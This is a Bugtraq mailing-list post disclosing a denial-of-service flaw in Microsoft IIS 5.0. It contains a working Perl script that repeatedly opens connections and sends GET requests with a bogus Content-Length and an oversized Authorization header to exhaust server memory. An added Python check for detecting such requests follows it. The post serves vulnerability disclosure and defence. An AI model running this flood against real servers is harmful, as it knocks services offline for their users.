Bugtraq mailing list archives

Microsoft IIS/5.0 Content-Length DoS (proved)


From: "Ivan Hernandez Puga" <ivan.hernandez () globalsis com ar>
Date: Wed, 12 Dec 2001 16:01:26 -0300

Well, I have finally done testing on this and I have made a 1 GB RAM server
go Out Of Virtual Memory and become basically unusable with one script that
uses the flaw exposed in the other mails.
I suppose that now it's a real security bug.

Thanks

Ivan Hernandez
------------------------------------------------------------------------
#!/usr/bin/perl
# Written by Ivan Hernandez over code of Georgi Guninski 
use IO::Socket;

print "IIS 5.0 Bogus Content-Length\n";

$port = @ARGV[1];
$host = @ARGV[0];

        $req="GET /ampgn HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic " . "A" x 50000 . "\r\n\r\n";

$i=0;
        while (1) {
                $socket[$i] = IO::Socket::INET->new(PeerAddr =>
$host,PeerPort => $port,Proto => "TCP");
                syswrite($socket[$i],$req,length($req));
                        print ".";
                        $i++;
                
        }

$i=0;

print "\nDone.";

------------------------------------------------------------------------
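
An added example, not part of the original post or of any vendor fix: a front-end check that inspects a raw HTTP request head for the traits visible in the request above (a Content-Length declared on a GET, a multi-megabyte declared body, and a very long header value). The function name, the limits and the sample request are assumptions made for illustration.

```python
# Added example (not from the original post). The limits below
# are assumed values; tune them to what the application legitimately needs.
MAX_HEADER_VALUE = 8192        # assumed per-header value limit, bytes
MAX_DECLARED_BODY = 1_048_576  # assumed request-body limit, bytes
BODYLESS_METHODS = {"GET", "HEAD"}


def inspect_request_head(raw: bytes) -> list[str]:
    """Return the reasons to reject a request, judged from its head only."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.replace("\r\n", "\n").split("\n")
    parts = lines[0].split()
    if len(parts) != 3:
        return ["malformed request line"]
    method = parts[0].upper()
    reasons, lengths = [], []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            reasons.append("malformed header line")
            continue
        value = value.strip()
        if len(value) > MAX_HEADER_VALUE:
            reasons.append(f"oversized {name.strip()} header ({len(value)} bytes)")
        if name.strip().lower() == "content-length":
            lengths.append(value)
    if len(set(lengths)) > 1:
        reasons.append("conflicting Content-Length headers")
    for value in lengths[:1]:
        if not (value.isascii() and value.isdigit()):
            reasons.append("non-numeric Content-Length")
            continue
        if int(value) > MAX_DECLARED_BODY:
            reasons.append(f"declared body of {value} bytes exceeds limit")
        if int(value) > 0 and method in BODYLESS_METHODS:
            reasons.append(f"{method} request declares a body")
    return reasons


# Constructed sample with the same traits as the request in the post.
SAMPLE = (b"GET /x HTTP/1.1\r\nHost: example.test\r\n"
          b"Content-Length: 5300643\r\n"
          b"Authorization: Basic " + b"A" * 50000 + b"\r\n\r\n")

if __name__ == "__main__":
    for reason in inspect_request_head(SAMPLE):
        print("reject:", reason)
```

A head check like this does not cover the many-connections part of the script; per-client connection limits and a timeout on bodies that never arrive address that side.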

